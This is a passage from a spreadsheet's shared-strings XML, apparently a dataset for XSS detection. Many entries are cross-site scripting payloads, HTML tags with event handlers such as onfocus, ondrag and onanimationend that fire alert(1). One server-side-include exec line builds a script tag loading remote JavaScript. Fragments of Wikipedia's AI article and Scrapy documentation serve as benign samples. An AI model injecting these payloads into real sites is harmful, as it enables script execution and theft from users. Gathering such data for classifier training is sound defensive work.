    <t>&lt;code id=x tabindex=1 onactivate=alert(1)&gt;&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;th draggable="true" ondrag="alert(1)"&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Qualification_problem-104"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Qualification_problem_104-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;meter oncopy="alert(1)" contenteditable&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>The &lt;a href="/wiki/Physical_symbol_system" title="Physical symbol system"&gt;physical symbol systems &lt;/a&gt; hypothesis:</t>
  </si>
  <si>
    <t>&lt;ruby onbeforecopy="alert(1)" contenteditable&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;abbr id=x tabindex=1 onactivate=alert(1)&gt;&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;section oncopy="alert(1)" contenteditable&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;output onpointerleave=alert(1)&gt;XSS&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;dir style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;footer id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onpointermove=alert(1)&gt;XSS&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;samp oncut="alert(1)" contenteditable&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;area onkeyup="alert(1)" contenteditable&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;embed draggable="true" ondragenter="alert(1)"&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/colgroup&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onpointerout=alert(1)&gt;XSS&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;rtc oncopy="alert(1)" contenteditable&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/fieldset&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-313"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-313"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;del oncopy="alert(1)" contenteditable&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;tbody oncut="alert(1)" contenteditable&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;ins draggable="true" ondragleave="alert(1)"&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-413"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-413"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;fieldset onkeydown="alert(1)" contenteditable&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div style="padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;center id=x tabindex=1 onfocus=alert(1)&gt;&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;tt onpointermove=alert(1)&gt;XSS&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;iframe id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;i ondrop=alert(1) contenteditable&gt;drop here&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;legend ondragover=alert(1) contenteditable&gt;drop here&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;textarea ondblclick="alert(1)"&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;canvas ondblclick="alert(1)"&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Software_framework" title="Software framework"&gt;Software framework &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;h1 draggable="true" ondragstart="alert(1)"&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;tr onmouseout="alert(1)"&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20181215015645/https://hbr.org/2018/05/10-promising-ai-applications-in-health-care"&gt;"10 Promising AI Applications in Health Care" &lt;/a&gt;. &lt;i&gt;Harvard Business Review &lt;/i&gt;. 10 May 2018. Archived from &lt;a rel="nofollow" class="external text" href="https://hbr.org/2018/05/10-promising-ai-applications-in-health-care"&gt;the original &lt;/a&gt; on 15 December 2018&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;28 August </t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/commands.html"&gt;Command line tool&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Ferroelectric_RAM" title="Ferroelectric RAM"&gt;FRAM &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;dialog ondragover=alert(1) contenteditable&gt;drop here&lt;/dialog&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://www.gbgplc.com/inside/ai/"&gt;"AI isn't taking over the world – it doesn't exist yet" &lt;/a&gt;. &lt;i&gt;GBG Global website &lt;/i&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=GBG+Global+website&amp;amp;rft.atitle=AI+isn%27t+taking+over+the+world+%E2%80%93+it+doesn%27t+exist+yet&amp;amp;rft_id=https%3A%2F%2Fwww.gbgplc.com%2Finside%2Fai%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">            &lt;a href="//readthedocs.org/builds/scrapy/?fromdocs=scrapy"&gt;Builds&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;listing onpointerleave=alert(1)&gt;XSS&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main articles: &lt;a href="/wiki/Logic_programming" title="Logic programming"&gt;Logic programming &lt;/a&gt; and &lt;a href="/wiki/Automated_reasoning" title="Automated reasoning"&gt;Automated reasoning &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onmouseout="alert(1)"&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;select onpointerenter=alert(1)&gt;XSS&lt;/select&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Decrease in demand for human labor </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/a&gt; &lt;/div&gt;&lt;ul style="border-top:1px solid #aaa; padding: 0.75em 0; width:217px; margin:0 auto;"&gt;&lt;li style="min-height: 31px;"&gt;&lt;span style="display: inline-block; width: 31px; line-height: 31px; vertical-align: middle; text-align: center;"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/en/thumb/0/06/Wiktionary-logo-v2.svg/27px-Wiktionary-logo-v2.svg.png" decoding="async" width="27" height="27" style="vertical-align: middle" srcset="//upload.wikimedia.org/wikipedia/en/thumb/0/06/Wiktionary-logo-v2.svg/41px-Wiktionary-logo-v2.svg.png 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/0/06/Wiktionary-logo-v2.svg/54px-Wiktionary-logo-v2.svg.png 2x" data-file-width="391" data-file-height="391" /&gt; </t>
  </si>
  <si>
    <t>&lt;style id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/style&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;audio autoplay controls onvolumechange=alert(1)&gt;&lt;source src="validaudio.wav" type="audio/wav"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;h1 oncontextmenu="alert(1)"&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-58"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-58"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;abbr onbeforecopy="alert(1)" contenteditable&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/blockquote&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Philosophy_of_technology" title="Philosophy of technology"&gt;Technology &lt;/a&gt;</t>
  </si>
  <si>
    <t>Cognitive simulation, &lt;a href="/wiki/Allen_Newell" title="Allen Newell"&gt;Newell &lt;/a&gt; and &lt;a href="/wiki/Herbert_A._Simon" title="Herbert A. Simon"&gt;Simon &lt;/a&gt;, AI at &lt;a href="/wiki/Carnegie_Mellon_University" title="Carnegie Mellon University"&gt;CMU &lt;/a&gt; (then called &lt;a href="/wiki/Carnegie_Tech" class="mw-redirect" title="Carnegie Tech"&gt;Carnegie Tech &lt;/a&gt;):</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=40" title="Edit section: Government"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;figcaption onmouseout="alert(1)"&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;script onmouseleave="alert(1)"&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;address id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;xmp ondrop=alert(1) contenteditable&gt;drop here&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;li onpointerout=alert(1)&gt;XSS&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Automated_planning_and_scheduling" title="Automated planning and scheduling"&gt;Planning &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;progress draggable="true" ondragenter="alert(1)"&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;meta name="ResourceLoaderDynamicStyles" content=""/&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Cliff_Joslyn" title="Cliff Joslyn"&gt;Cliff Joslyn &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;aside onmouseenter="alert(1)"&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;cite onmouseover="alert(1)"&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;samp ondblclick="alert(1)"&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;embed oncut="alert(1)" contenteditable&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;The limits of artificial general intelligence </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;select style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;b onpointerdown=alert(1)&gt;XSS&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;nobr id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onmouseleave="alert(1)"&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Received_view_of_theories" title="Received view of theories"&gt;Received view &lt;/a&gt;&amp;#160;/&amp;#32;&lt;a href="/wiki/Semantic_view_of_theories" title="Semantic view of theories"&gt;Semantic view of theories &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Robot_rights" class="mw-redirect" title="Robot rights"&gt;Robot rights &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;style onpointermove=alert(1)&gt;XSS&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;path&gt;&lt;animateMotion onrepeat=alert(1) dur="1s" repeatCount="2"&gt;</t>
  </si>
  <si>
    <t>&lt;thead onpointerout=alert(1)&gt;XSS&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;sub onpointerenter=alert(1)&gt;XSS&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;ul style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;figure id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Internet_of_things" title="Internet of things"&gt;Internet of things &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;span style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;slot id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;style id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Integrated_circuit" title="Integrated circuit"&gt;Integrated circuit &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ul id=x tabindex=1 onactivate=alert(1)&gt;&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/link-extractors.html"&gt;&lt;span class="doc"&gt;Link Extractors</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;br style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/br&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2Fj.techfore.2016.08.019"&gt;10.1016/j.techfore.2016.08.019 &lt;/a&gt;. &lt;a href="/wiki/International_Standard_Serial_Number" title="International Standard Serial Number"&gt;ISSN &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//www.worldcat.org/issn/0040-1625"&gt;0040-1625 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Technological+Forecasting+and+Social+Change&amp;amp;rft.atitle=The+future+of+employment%3A+How+susceptible+are+jobs+to+computerisation%3F&amp;amp;rft.volume=114&amp;amp;rft.pages=254-280&amp;amp;rft.date=2017-01-01&amp;amp;rft_id=%2F%2Fciteseerx.ist.psu.edu%2Fviewdoc%2Fsummary%3Fdoi%3D10.1.1.395.416&amp;amp;rft.issn=0040-1625&amp;amp;rft_id=info%3Adoi%2F10.1016%2Fj.techfore.2016.08.019&amp;amp;rft.aulast=Frey&amp;amp;rft.aufirst=Carl+Benedikt&amp;amp;rft.au=Osborne%2C+Michael+A&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;h1 id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;712–754, &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;h1&gt;Scrapy 2.0 documentation&lt;a class="headerlink" href="#scrapy-version-documentation" title="Permalink to this headline"&gt;¶&lt;/a&gt;&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;tr onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/tr&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;center onmouseenter="alert(1)"&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;426–441 &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;The most widely used analogical AI until the mid-1990s&lt;sup id="cite_ref-FOOTNOTEDomingos2015187_220-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEDomingos2015187-220"&gt;&amp;#91;214&amp;#93; &lt;/a&gt; &lt;/sup&gt; </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;885–892 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;base ondragover=alert(1) contenteditable&gt;drop here&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Philosophy_of_biology" title="Philosophy of biology"&gt;Biology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;nextid draggable="true" ondragleave="alert(1)"&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;menu draggable="true" ondrag="alert(1)"&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/a&gt; &lt;/i&gt;&amp;#93; &lt;/sup&gt;.</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;input style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;footer style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;object onerror=alert(1) data=1 type=image/gif&gt;</t>
  </si>
  <si>
    <t>&lt;span onpointerdown=alert(1)&gt;XSS&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;small draggable="true" ondrag="alert(1)"&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, p.&amp;#160;153 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;!--#exec cmd="/bin/echo '&lt;SCR'"--&gt;&lt;!--#exec cmd="/bin/echo 'IPT SRC=http://.rocks/.js&gt;&lt;/SCRIPT&gt;'"--&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFKismet"&gt;&lt;i&gt;Kismet &lt;/i&gt; &lt;/a&gt;. </t>
  </si>
  <si>
    <t>&lt;listing draggable="true" ondragleave="alert(1)"&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onblur=alert(1) tabindex=1 id=x&gt;&lt;/bdo&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;bdi id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;thead onblur=alert(1) tabindex=1 id=x&gt;&lt;/thead&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Alexander_Lerner" title="Alexander Lerner"&gt;Alexander Lerner &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;th ondblclick="alert(1)"&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onmouseout="alert(1)"&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;listing draggable="true" ondragenter="alert(1)"&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Hospitality"&gt;Hospitality </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-gillick2015-274"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-gillick2015_274-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;main onkeydown="alert(1)" contenteditable&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;input ondblclick="alert(1)"&gt;test&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onbeforepaste="alert(1)" contenteditable&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;base id=x tabindex=1 onfocus=alert(1)&gt;&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onpointerout=alert(1)&gt;XSS&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;frame oncontextmenu="alert(1)"&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-29"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-29"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Christy, Charles A. (17 January 1990). &lt;a rel="nofollow" class="external text" href="https://www.latimes.com/archives/la-xpm-1990-01-17-fi-233-story.html"&gt;"Impact of Artificial Intelligence on Banking" &lt;/a&gt;. &lt;i&gt;latimes.com &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;10 September </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-149"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-149"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;ul draggable="true" ondragstart="alert(1)"&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;span onkeydown="alert(1)" contenteditable&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;tr onpointerout=alert(1)&gt;XSS&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;tr onmouseover="alert(1)"&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;menu onblur=alert(1) tabindex=1 id=x&gt;&lt;/menu&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/bdo&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;param onpointerleave=alert(1)&gt;XSS&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;object ondragover=alert(1) contenteditable&gt;drop here&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onpointerenter=alert(1)&gt;XSS&lt;/noembed&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/a&gt; &lt;/i&gt;&amp;#93; &lt;/sup&gt;. These learners could therefore, derive all possible knowledge, by considering every possible hypothesis and matching them against the data. In practice, it is almost never possible to consider every possibility, because of the phenomenon of "&lt;a href="/wiki/Combinatorial_explosion" title="Combinatorial explosion"&gt;combinatorial explosion &lt;/a&gt;", where the amount of time needed to solve a problem grows exponentially. Much of AI research involves figuring out how to identify and avoid considering broad range of possibilities that are unlikely to be beneficial.&lt;sup id="cite_ref-Intractability_68-0" class="reference"&gt;&lt;a href="#cite_note-Intractability-68"&gt;&amp;#91;66&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-FOOTNOTEDomingos2015Chapter_2,_Chapter_3_69-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEDomingos2015Chapter_2,_Chapter_3-69"&gt;&amp;#91;67&amp;#93; &lt;/a&gt; &lt;/sup&gt; For example, when viewing a map and looking for the shortest driving route from &lt;a href="/wiki/Denver" title="Denver"&gt;Denver &lt;/a&gt; to &lt;a href="/wiki/New_York_City" title="New York City"&gt;New York &lt;/a&gt; in the East, one can in most cases skip looking at any path through &lt;a href="/wiki/San_Francisco" title="San Francisco"&gt;San Francisco &lt;/a&gt; or other areas far to the West; thus, an AI wielding a pathfinding algorithm like &lt;a href="/wiki/A*_search_algorithm" title="A* search algorithm"&gt;A* &lt;/a&gt; can avoid the combinatorial explosion that would ensue if every possible route had to be ponderously considered in turn.&lt;sup id="cite_ref-70" class="reference"&gt;&lt;a href="#cite_note-70"&gt;&amp;#91;68&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;track onbeforecut="alert(1)" contenteditable&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;listing draggable="true" ondrag="alert(1)"&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onpointerout=alert(1)&gt;XSS&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;applet onpaste="alert(1)" contenteditable&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;p class="caption"&gt;&lt;span class="caption-text"&gt;Solving specific problems</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="/en/1.5/"&gt;1.5&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=25" title="Edit section: Integrating the approaches"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;nextid style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;center onpointermove=alert(1)&gt;XSS&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;center oncopy="alert(1)" contenteditable&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;big onkeypress="alert(1)" contenteditable&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;abbr style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>document.querySelector("")</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFHolland1975" class="citation book"&gt;Holland, John H. (1975). &lt;span class="cs1-lock-registration" title="Free registration required"&gt;&lt;a rel="nofollow" class="external text" href="https://archive.org/details/adaptationinnatu00holl"&gt;&lt;i&gt;Adaptation in Natural and Artificial Systems &lt;/i&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;790–831 &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Understand the classes used to represent HTTP requests and responses.&lt;/dd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Ethical_machines"&gt;Ethical machines </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_bird_terms" title="Glossary of bird terms"&gt;Ornithology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;menu id=x tabindex=1 onfocus=alert(1)&gt;&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;progress onbeforepaste="alert(1)" contenteditable&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
